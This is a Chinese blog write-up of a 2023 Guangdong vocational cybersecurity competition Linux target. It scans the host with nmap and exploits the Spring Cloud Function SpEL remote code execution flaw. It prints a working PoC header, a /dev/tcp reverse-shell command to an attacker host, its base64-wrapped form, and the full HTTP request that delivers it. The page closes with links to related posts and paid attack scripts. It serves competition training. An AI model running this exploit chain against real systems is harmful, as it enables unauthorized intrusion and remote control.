2023年广东省中职网络安全竞赛C模块Linux靶机解析(详细每一步)

已于 2023-05-27 16:30:55 修改
阅读量1k 收藏 11
点赞数
文章标签: web安全 CTF 系统安全 网络安全
于 2023-05-27 15:20:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50377269/article/details/130901777
版权

2023年广东省中职网络安全竞赛C模块Linux靶机解析(详细每一步)

需要环境可以私信博主

C模块描述

漏洞信息发掘

         漏洞复现过程

C模块描述

一、项目和任务描述:

假定你是某企业的网络安全渗透测试工程师,负责企业某些服务器的安全防护,为了更好的寻找企业网络中可能存在的各种问题和漏洞。你尝试利用各种攻击手段,攻击特定靶机,以便了解最新的攻击手段和技术,了解网络黑客的心态,从而改善您的防御策略。

请根据《赛场参数表》提供的信息,在客户端使用谷歌浏览器登录答题平台。

二、操作系统环境说明:

客户机操作系统:Windows 10/Windows7

靶机服务器操作系统:Linux/Windows

三、漏洞情况说明:

1.服务器中的漏洞可能是常规漏洞也可能是系统漏洞;

2.靶机服务器上的网站可能存在命令注入的漏洞,要求选手找到命令注入的相关漏洞,利用此漏洞获取一定权限;

3.靶机服务器上的网站可能存在文件上传漏洞,要求选手找到文件上传的相关漏洞,利用此漏洞获取一定权限;

4.靶机服务器上的网站可能存在文件包含漏洞,要求选手找到文件包含的相关漏洞,与别的漏洞相结合获取一定权限并进行提权;

5.操作系统提供的服务可能包含了远程代码执行的漏洞,要求用户找到远程代码执行的服务,并利用此漏洞获取系统权限;

6.操作系统提供的服务可能包含了缓冲区溢出漏洞,要求用户找到缓冲区溢出漏洞的服务,并利用此漏洞获取系统权限;

7.操作系统中可能存在一些系统后门,选手可以找到此后门,并利用预留的后门直接获取到系统权限。

四、注意事项:

1.不能对裁判服务器进行攻击,警告一次后若继续攻击将判令该参赛队离场;

2.flag值为每台靶机服务器的唯一性标识,每台靶机服务器仅有1个;

3.选手攻入靶机后不得对靶机进行关闭端口、修改密码、重启或者关闭靶机、删除或者修改flag、建立不必要的文件等操作;

4.在登录自动评分系统后,提交靶机服务器的flag值,同时需要指定靶机服务器的IP地址;

5.赛场根据难度不同设有不同基础分值的靶机,对于每个靶机服务器,前三个获得flag值的参赛队在基础分上进行加分,本阶段每个队伍的总分均计入阶段得分,具体加分规则参照赛场评分标准;

6.本环节不予补时。

漏洞信息发掘

1、先试用nmap探测靶机开放服务信息,如下图所示

发现靶机开放22、139、445、8080端口,于是我这里对22、445端口实施攻击均失败(失败过程就不展示了)

接下来只剩下8080端口,执行访问8080端口

这不是报错界面,这是一个提示界面,于是我们网上浏览得知

漏洞信息

漏洞名称:Spring Cloud Function SpEL 远程代码执行漏洞

危害等级:高危

漏洞类型:中间件漏洞

漏洞概述:由于Spring CloudFunction中RoutingFunction类的apply方法将请求头中的"spring.cloud.function.routing-expression"参数作为Spel表达式进行处理,造成了Spel表达式注入漏洞,当使用路由功能时,攻击者可利用该漏洞远程执行任意代码

漏洞复现过程

访问漏洞url:http://192.168.94.145:8080/functionRouter

POC:spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch /tmp/success")

对靶机进行抓包,并将包转换为post类型,在转换后的包内添加poc,并发送:如下图

这里可以看出我们在包中添加的信息已经发送给靶机,做出了回应

那么我们可以做一个反弹shell添加进去,让靶机反弹shell回来

这里我用我的kali作为反弹机子,IP地址为192.168.94.139

然后制造反弹shell命令,这里我推荐一个制作shell网站

地址:反弹shell生成器

得到:

sh -i >& /dev/tcp/192.168.94.139/9998 0>&1

然后我们得对命令进行base64加密

这里也推荐一个工具网站

地址:java.lang.Runtime.exec() Payload Workarounds - @Jackson_T

得出:

bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC45NC4xMzkvOTk5OCAwPiYx}|{base64,-d}|{bash,-i}

kali linux开启监听,然后我们将加密后的命令加入数据包并发给靶机

POST /functionRouter HTTP/1.1

Host: 192.168.94.145:8080

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC45NC4xMzkvOTk5OCAwPiYx}|{base64,-d}|{bash,-i}")

Content-Length: 51

Connection: close

Upgrade-Insecure-Requests: 1

然后kali中成功返回shell

然后C模块比赛中,虽然进入了shell,但是靶机这里找不到flagvalue.txt文件,根据比赛选手说,他们也是在赛场上找不到flagvalue的文件,可能这个环境没做好,我们这里也是在/root目录下没有找到flagvalue文件

但是我通过特殊方式进入靶机查看确实是有flagvalue.txt文件的(苦笑了)

旺仔Sec
关注
  • 0
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
中职网络安全关于体验C模块
qq_57147160的博客
12-18 4004
C模块其实真的没有那么难! 首先必须要先找到存活的靶机ip,如果盲目的进行批量攻击的话,不说能不能攻击道裁判机,其中还有一些本机的电脑,攻击那样的话可能要浪费很多时间,还不如先找到靶机来对症下药(kali中的一些渗透工具就可以轻松的找到如:masscan就是一个不错的工具)。 其实不必要担心靶机的样子,其实如果你真正找到了靶机靶机其实是非常特别的,你会一眼就看出来它是一个靶机,因为上面的端口都是一些必要常用漏洞的端口,且非常干净利落,没有一些杂端口。 在答C模块的时候要注意一个点
2022中职组网络空间安全c模块靶机,扫描存活靶机(适用任何市赛省赛国赛扫描靶机
weixin_48800344的博客
02-08 6330
模块C CTF夺旗-攻击 (本模块200分) 一、项目和任务描述: 假定你是某企业的网络安全渗透测试工程师,负责企业某些服务器的安全防护,为了更好的寻找企业网络中可能存在的各种问题和漏洞。你尝试利用各种攻击手段,攻击特定靶机,以便了解最新的攻击手段和技术,了解网络黑客的心态,从而改善您的防御策略。 请根据《赛场参数表》提供的信息,在客户端使用谷歌浏览器登录攻击机。 二、操作系统环境说明: 客户机操作系统:Windows 10/Windows7 靶机服务器操作系统:Linux/Windows 三、漏洞情况.
中职网络安全技能竞赛C模块靶机池扫描attack脚本
12-10
网络安全技能竞赛 省赛C模块 扫描靶机池号段与批量attack靶机get shell的python脚本
中职网络安全技能竞赛C模块脚本
04-27
中职网络安全技能竞赛C模块 ,python一键自动化脚本
DC-2靶机详解(1),2024最新网络安全面试刷题
最新发布
2401_83947353的博客
04-17 960
wpscan --url http://dc-2/ --api-token 这边填你的APIToken。export PATH=$PATH:/bin:/usr/bin:这个命令将当前 $PATH。:set shell=/bin/sh:这个命令将 Vi 编辑器的 shell 设。这意味着系统将在 /bin 和 /usr/bin 目录中查找命令。的值与 /bin 和 /usr/bin 目录结合起来,并将结果重新分配给。会 在 $PATH 中列出的目录中查找这个命令的可执行文件。搜索可执行文件时要查找的目录。
网络安全C模块命令
weixin_57536426的博客
12-21 515
后台持续监听(恶心别人,一些环境中,只要你监听不结束,别人是无法进入获取flag)还是那句话,你在打命令的时候,别人已经用脚本拿一血了。扫描存活主机(便捷,速度还行,缺点无法进行系统区分)msfconsole -r 文件名。批量获取会话flag。
2022中职网络安全C模块扫描存活靶机脚本(市赛,省赛,国赛)
qq_57147160的博客
02-19 5769
大体的思路就是将扫描出存活的靶机存储在txt中。 A B C D段都可以扫描,只需修改ip地址的相关内容即可。 可以私聊博主进行购买,不过需要购买此专栏,碰到什么问题可以私聊博主。 博主会给出相应的教程,以后会有更多的脚本在此专栏中。 跑出的结果存在txt中,非常直观。 接下来我们看一下脚本: 首先就是说一下脚本的大体思路: 大体思路当然要利用好kali中的扫描工具,不用白不用嘛。 我自己在这里使用的工具是fping这个工具,这是一个p8中的工具,没想到今天用...
中职网络安全C模块全漏洞脚本讲解包含4个漏洞的脚本
qq_57147160的博客
07-03 2708
中职网络安全全漏洞脚本。
中职网络安全C模块脚本.rar
06-09
中职网络安全python脚本 新规程C模块的脚本,有mysql、vsftpd和ping三个脚本,三个脚本结合使用渗透靶机获取flag,mysql、vsftpd都是linux渗透linux的,ping是windows和linnux都可使用,如购买有问题可私信博主
网络安全中职组C模块webshell.py脚本
11-19
网络安全中职组C模块webshell.py脚本
2021山东省职业院校技能大赛网络安全赛项C模块Linux靶机
04-29
(三)模块C CTF夺旗-攻击 (本模块200分) 一、项目和任务描述: 假定你是某企业的网络安全渗透测试工程师,负责企业某些服务器的安全防护,为了更好的寻找企业网络中可能存在的各种问题和漏洞。你尝试利用各种攻击...
2022网络空间安全中职组C模块批量全漏洞脚本(这个脚本非常实用,购买后私聊博主,给到使用教程。)
02-20
购买后记得私聊博主,给到教程。
2023内蒙古自治区中职网络安全赛题-B模块
06-01
内容概要:2023内蒙古自治区中职网络安全赛题,主要考点为web系统安全,misc,数据分析。 适合人群:正在学习网络安全的小白,和在中职网络安全比赛的选手,具备一定的网络安全知识体系基础。 能学到什么:①...
2021江西省网络安全B模块靶机(共五台)
06-20
2021江西省网络安全B模块靶机(共五台)均放在阿里云盘
2021全国职业院校技能大赛网络安全赛项C模块心得
旺仔Sec&blog
04-28 5196
靶机池网段例如: 物理机ip10.10.101.1,有30个队伍,那么靶机池ip从10.10.130.0/24开始,每个网段十台靶机,大概一百多台靶机靶机ip是10.10.130.241-250,每个靶机漏洞都不一样,五台linux,五台windows,每个网段所对应的靶机ip也不一样,例如10.10.130.241是ftp弱口令,那么10.10.131.245也有可能是弱口令,10.10.131.241可能是别的漏洞,所有靶机ip的d段都是241-250随机的。 漏洞linux和windows各一个
数据安全靶机
k0sec的安全路
07-03 499
1’ order by 1# 1’ order by 2# 1’ order by 3# //报错,所以order by猜解得到的列数为2,判断字段数为2 判断回显点,有两个回显点 1’ union select 1,2# 查询当前数据库版本,查询当前数据库名 1’ union select version(),database()# 查询当前数据库 表名 1’ union select 1,ta...
2021全国职业院校技能大赛(中职组)网络安全竞赛试题①详细解析教程
旺仔Sec&blog
06-23 9174
每个参赛队拥有专属的堡垒机服务器,其他队不能访问。假定你是某网络安全技术支持团队成员,某企业的服务器系统被黑客攻击,你的团队前来帮助企业进行调查并追踪本次网络攻击的源头,分析黑客的攻击方式,发现系统漏洞,提交网络安全事件响应报告,修复系统漏洞,删除黑客在系统中创建的后门,并帮助系统恢复正常运行。1.从靶机服务器场景FTP服务器中下载文件RCE1.py,编辑该Python程序文件,使该程序实现对Server10进行远程代码执行渗透测试的功能,填写该文件当中空缺的F1字符串,将该字符串作为Flag值提交;
网络空间安全——攻防对抗 2.0
热门推荐
Jay
05-19 1万+
网络空间安全——攻防对抗 2 信息收集,使用kali,扫描己方靶机端口 21端口的ftp的攻击 ftp攻击方式,查看本机有哪些普通用户 admin/123456和guest/123456 然后提交flag 22端口的ssh攻击 使用session –I查看已经获取到的连接 使用session –I序号 获取连接 23 telnet的攻击方式 防御21-2...
网络安全-靶机环境搭建
Chaoer
06-21 742
靶机环境搭建1.1.1 LAMP介绍LAMP是Linux下Apache、MySQL和PHP的应用环境。Linux + Apache + MySQL + PHP平台:Apache Http Server:web服务器软件MySQL:关系型数据库管理系统PHP:通用开源脚本语言1.1.2 LAMP安装配置安装 Apache 服务:sudo yum install httpd -y开启 Apache 服务:sudo systemctl start httpd。服务开启后用浏览器访问 localhost,如果能看到
中职网络安全c模块脚本
09-09
中职网络安全C模块脚本主要用于编写和执行与网络安全相关的任务和功能。在网络安全领域,C语言是一种常用的编程语言,因其性能强大和灵活性高而备受青睐。 首先,C模块脚本的主要目标是帮助开发人员编写出高效、可靠的网络安全脚本。通过使用C语言,可以实现对网络协议、数据包分析、入侵检测等关键任务的编码和实现。这样可以确保脚本的执行效率高,并能够快速地响应和处理各种网络威胁。 其次,C模块脚本提供了各种网络安全相关的函数和库,用于处理多样化的网络安全任务。例如,可以利用C语言中的套接字编程功能来实现网络扫描、漏洞检测等任务。同时,C模块脚本还可以利用各种加密算法和安全协议来保护网络通信的机密性和完整性。 此外,C模块脚本还支持与其他编程语言和工具的集成。通过使用C语言,可以实现与其他网络安全工具和框架的无缝集成,进一步提高脚本的功能和灵活性。另外,C模块脚本也可以通过调用系统级别的API来实现对操作系统底层的网络安全功能的访问和控制。 总之,中职网络安全C模块脚本是网络安全领域中必不可少的工具之一。通过使用C语言,可以编写出高效、可靠的网络安全脚本,帮助实现网络威胁的监测和处理,提升网络安全的水平。同时,C模块脚本还可以与其他编程语言和工具进行集成,增强其功能和适用性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

旺仔Sec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值